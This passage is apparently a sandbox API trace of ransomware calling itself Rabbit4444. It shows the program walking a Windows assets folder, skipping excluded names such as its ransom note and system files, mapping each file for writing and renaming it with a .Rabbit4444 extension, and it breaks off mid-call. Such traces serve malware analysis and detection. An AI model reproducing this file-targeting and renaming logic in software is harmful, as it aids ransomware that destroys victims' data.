[0071.370] lstrlenW (lpString=".dll") returned 4 [0071.370] lstrcmpiW (lpString1="f147", lpString2=".dll") returned 1 [0071.370] lstrlenW (lpString=".lnk") returned 4 [0071.370] lstrcmpiW (lpString1="f147", lpString2=".lnk") returned 1 [0071.370] lstrlenW (lpString=".ini") returned 4 [0071.370] lstrcmpiW (lpString1="f147", lpString2=".ini") returned 1 [0071.370] lstrlenW (lpString=".sys") returned 4 [0071.370] lstrcmpiW (lpString1="f147", lpString2=".sys") returned 1 [0071.370] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.370] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.370] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16268108689) returned 1 [0071.370] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=385772) returned 1 [0071.370] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0071.370] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0071.371] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5e5f0, lpName=0x0) returned 0x27c [0071.371] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5e5f0) returned 0x2b0000 [0071.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1107c8 [0071.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0071.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1107c8 | out: hHeap=0xe0000) returned 1 [0071.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0071.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0071.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0071.384] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16269509997) returned 1 [0071.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0071.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0071.384] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0071.388] CloseHandle (hObject=0x27c) returned 1 [0071.388] CloseHandle (hObject=0x260) returned 1 [0071.388] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147.Rabbit4444") returned 187 [0071.388] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2a0d12eaf601bee34ec27e259e078b544dc92f1da956845baf350faf15f2f147.rabbit4444"), dwFlags=0x1) returned 1 [0071.389] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86176f70, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x86176f70, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x8625bd94, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", cAlternateFileName="2A104F~1")) returned 1 [0071.389] lstrcmpiW (lpString1="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.389] lstrcmpiW (lpString1="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.389] lstrcmpiW (lpString1="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", lpString2="Rabbit4444.exe") returned -1 [0071.389] lstrcmpiW (lpString1="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", lpString2=".") returned 1 [0071.389] lstrcmpiW (lpString1="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", lpString2="..") returned 1 [0071.389] lstrcmpiW (lpString1="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", lpString2="windows") returned -1 [0071.389] lstrcmpiW (lpString1="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", lpString2="bootmgr") returned -1 [0071.389] lstrcmpiW (lpString1="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", lpString2="pagefile.sys") returned -1 [0071.389] lstrcmpiW (lpString1="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", lpString2="boot") returned -1 [0071.389] lstrcmpiW (lpString1="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", lpString2="ids.txt") returned -1 [0071.389] lstrcmpiW (lpString1="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", lpString2="NTUSER.DAT") returned -1 [0071.389] lstrcpyW (in: lpString1=0x130ec18, lpString2="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b" | out: lpString1="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b") returned="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b" [0071.389] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b", dwFileAttributes=0x0) returned 1 [0071.390] lstrlenW (lpString="2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b") returned 64 [0071.390] lstrlenW (lpString="Rabbit4444") returned 10 [0071.390] lstrcmpiW (lpString1="2d6beb3b5b", lpString2="Rabbit4444") returned -1 [0071.390] lstrlenW (lpString=".dll") returned 4 [0071.390] lstrcmpiW (lpString1="3b5b", lpString2=".dll") returned 1 [0071.390] lstrlenW (lpString=".lnk") returned 4 [0071.390] lstrcmpiW (lpString1="3b5b", lpString2=".lnk") returned 1 [0071.390] lstrlenW (lpString=".ini") returned 4 [0071.390] lstrcmpiW (lpString1="3b5b", lpString2=".ini") returned 1 [0071.390] lstrlenW (lpString=".sys") returned 4 [0071.390] lstrcmpiW (lpString1="3b5b", lpString2=".sys") returned 1 [0071.390] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.390] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.390] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16270102512) returned 1 [0071.390] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17248) returned 1 [0071.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0071.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0071.390] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4660, lpName=0x0) returned 0x27c [0071.391] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4660) returned 0x70000 [0071.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110be8 [0071.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0071.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110be8 | out: hHeap=0xe0000) returned 1 [0071.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0071.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0071.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0071.394] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16270512914) returned 1 [0071.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0071.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0071.394] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.395] CloseHandle (hObject=0x27c) returned 1 [0071.395] CloseHandle (hObject=0x260) returned 1 [0071.395] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b.Rabbit4444") returned 187 [0071.395] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2a104f1151db024c6dfc5c9f9e68353b4e4a19ba1cec6a324debd22d6beb3b5b.rabbit4444"), dwFlags=0x1) returned 1 [0071.396] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8a3f4c9, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb8a3f4c9, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb8afdfc3, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x20e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", cAlternateFileName="2A6007~1")) returned 1 [0071.396] lstrcmpiW (lpString1="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.396] lstrcmpiW (lpString1="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.396] lstrcmpiW (lpString1="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", lpString2="Rabbit4444.exe") returned -1 [0071.396] lstrcmpiW (lpString1="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", lpString2=".") returned 1 [0071.396] lstrcmpiW (lpString1="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", lpString2="..") returned 1 [0071.396] lstrcmpiW (lpString1="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", lpString2="windows") returned -1 [0071.396] lstrcmpiW (lpString1="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", lpString2="bootmgr") returned -1 [0071.396] lstrcmpiW (lpString1="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", lpString2="pagefile.sys") returned -1 [0071.396] lstrcmpiW (lpString1="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", lpString2="boot") returned -1 [0071.396] lstrcmpiW (lpString1="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", lpString2="ids.txt") returned -1 [0071.396] lstrcmpiW (lpString1="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", lpString2="NTUSER.DAT") returned -1 [0071.396] lstrcpyW (in: lpString1=0x130ec18, lpString2="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a" | out: lpString1="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a") returned="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a" [0071.396] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a", dwFileAttributes=0x0) returned 1 [0071.396] lstrlenW (lpString="2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a") returned 64 [0071.396] lstrlenW (lpString="Rabbit4444") returned 10 [0071.396] lstrcmpiW (lpString1="a357db277a", lpString2="Rabbit4444") returned -1 [0071.396] lstrlenW (lpString=".dll") returned 4 [0071.397] lstrcmpiW (lpString1="277a", lpString2=".dll") returned 1 [0071.397] lstrlenW (lpString=".lnk") returned 4 [0071.397] lstrcmpiW (lpString1="277a", lpString2=".lnk") returned 1 [0071.397] lstrlenW (lpString=".ini") returned 4 [0071.397] lstrcmpiW (lpString1="277a", lpString2=".ini") returned 1 [0071.397] lstrlenW (lpString=".sys") returned 4 [0071.397] lstrcmpiW (lpString1="277a", lpString2=".sys") returned 1 [0071.397] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.397] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.397] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16270789117) returned 1 [0071.397] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=526) returned 1 [0071.397] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0071.397] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0071.397] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x510, lpName=0x0) returned 0x27c [0071.401] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x510) returned 0x70000 [0071.403] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110198 [0071.403] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0071.403] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110198 | out: hHeap=0xe0000) returned 1 [0071.403] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0071.403] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.403] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0071.403] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.404] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0071.404] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16271431553) returned 1 [0071.404] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0071.404] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0071.404] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.404] CloseHandle (hObject=0x27c) returned 1 [0071.404] CloseHandle (hObject=0x260) returned 1 [0071.404] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a.Rabbit4444") returned 187 [0071.404] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2a6007d66fbdc1f32b8041b89a7ad569ba5e85516e19287f45548ca357db277a.rabbit4444"), dwFlags=0x1) returned 1 [0071.405] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83cf4eac, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x83cf4eac, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x88ee9d6d, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0xab877, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", cAlternateFileName="2C4710~1")) returned 1 [0071.405] lstrcmpiW (lpString1="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.405] lstrcmpiW (lpString1="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.405] lstrcmpiW (lpString1="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", lpString2="Rabbit4444.exe") returned -1 [0071.405] lstrcmpiW (lpString1="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", lpString2=".") returned 1 [0071.405] lstrcmpiW (lpString1="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", lpString2="..") returned 1 [0071.405] lstrcmpiW (lpString1="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", lpString2="windows") returned -1 [0071.405] lstrcmpiW (lpString1="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", lpString2="bootmgr") returned -1 [0071.405] lstrcmpiW (lpString1="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", lpString2="pagefile.sys") returned -1 [0071.405] lstrcmpiW (lpString1="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", lpString2="boot") returned -1 [0071.405] lstrcmpiW (lpString1="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", lpString2="ids.txt") returned -1 [0071.405] lstrcmpiW (lpString1="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", lpString2="NTUSER.DAT") returned -1 [0071.405] lstrcpyW (in: lpString1=0x130ec18, lpString2="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd" | out: lpString1="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd") returned="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd" [0071.405] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd", dwFileAttributes=0x0) returned 1 [0071.406] lstrlenW (lpString="2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd") returned 64 [0071.406] lstrlenW (lpString="Rabbit4444") returned 10 [0071.406] lstrcmpiW (lpString1="a5b8169dbd", lpString2="Rabbit4444") returned -1 [0071.406] lstrlenW (lpString=".dll") returned 4 [0071.406] lstrcmpiW (lpString1="9dbd", lpString2=".dll") returned 1 [0071.406] lstrlenW (lpString=".lnk") returned 4 [0071.406] lstrcmpiW (lpString1="9dbd", lpString2=".lnk") returned 1 [0071.406] lstrlenW (lpString=".ini") returned 4 [0071.406] lstrcmpiW (lpString1="9dbd", lpString2=".ini") returned 1 [0071.406] lstrlenW (lpString=".sys") returned 4 [0071.406] lstrcmpiW (lpString1="9dbd", lpString2=".sys") returned 1 [0071.406] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.406] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.406] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16271725527) returned 1 [0071.407] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=702583) returned 1 [0071.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0071.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0071.407] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xabb80, lpName=0x0) returned 0x27c [0071.408] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xabb80) returned 0x2f10000 [0071.502] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1106c0 [0071.502] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0071.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1106c0 | out: hHeap=0xe0000) returned 1 [0071.502] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0071.502] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0071.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0071.502] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16281317994) returned 1 [0071.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0071.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0071.503] UnmapViewOfFile (lpBaseAddress=0x2f10000) returned 1 [0071.509] CloseHandle (hObject=0x27c) returned 1 [0071.509] CloseHandle (hObject=0x260) returned 1 [0071.509] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\2c47102710a573389f9fec5352370c93db7b08a68475e056cbe941a5b8169dbd.Rabbit4444") returned 187 [0071.509] MoveFileExW 